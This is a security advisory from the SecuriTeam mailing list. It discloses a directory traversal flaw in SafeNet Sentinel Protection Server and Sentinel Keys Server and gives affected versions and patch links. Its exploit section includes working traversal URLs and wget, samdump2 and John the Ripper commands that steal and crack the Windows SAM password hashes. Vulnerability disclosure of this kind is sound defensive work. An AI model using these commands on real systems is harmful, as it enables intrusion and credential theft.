The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
SafeNet Sentinel Protection Server and Keys Server Directory Traversal
------------------------------------------------------------------------
SUMMARY
SafeNet Inc.'s Sentinel Protection Server and Sentinel Keys Server
products include web servers which are vulnerable to directory traversal
attacks. A remote attacker could exploit these vulnerabilities to read
arbitrary files with the permissions of the web server, typically SYSTEM.
DETAILS
Vulnerable Systems:
* Sentinel Protection Server version 7.0.0 through version 7.4.0 and
possibly below
* Sentinel Keys Server version 1.0.3 and possibly below
Immune Systems:
* Sentinel Protection Server version 7.4.1
* Sentinel Keys Server version 1.0.4
Sentinel Protection Server and Sentinel Keys Server run web servers on
ports 6002 and 7002, respectively, to allow remote monitoring of key use.
The web server software does not santize request paths correctly before
using them in system calls. As a result, an attacker can request files
outside the web server's directory root by using the ../ notation to refer
to the parent directory of the current directory.
Impact:
A remote attacker could exploit this vulnerability to read sensitive files
on the affected system. Attractive targets include the SAM registry hive
which contains system password hashes.
Solution:
Upgrade to Sentinel Protection Server version 7.4.1 and Sentinel Keys
Server version 1.0.4.
First upgrade the Sentinel Driver software to version 7.4.0 if you are
using an earlier version:
<http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip>
http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip
Then install "Security Patch to Sentinel Protection Installer 7.4.0"
<http://safenet-inc.com/support/files/SPI740SecurityPatch.zip>
http://safenet-inc.com/support/files/SPI740SecurityPatch.zip
Exploit:
Most popular web browsers are not be able to display URLs exploiting this
problem. We recommend using wget or lynx instead.
Substitute port 7002 to target Keys Server instead of Protection Server.
This example will retrieve the C:\boot.ini file.
http://XX.XX.XX.XX:6002/../../../../../../boot.ini
This example will retrieve a copy of the target system's SAM registry hive
from the Windows repair folder:
http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam
With the SAM and SYSTEM registry hives, it is possible to extract the
system's local password hashes for offline cracking. For example, using
the bkhive, samdump2, and John the Ripper tools:
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system
$ bkhive system keyfile
$ samdump2 sam keyfile > hashes
$ john --wordlist=all hashes
ADDITIONAL INFORMATION
The information has been provided by <mailto:ekendall@brandeis.edu>
Elliot Kendall.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
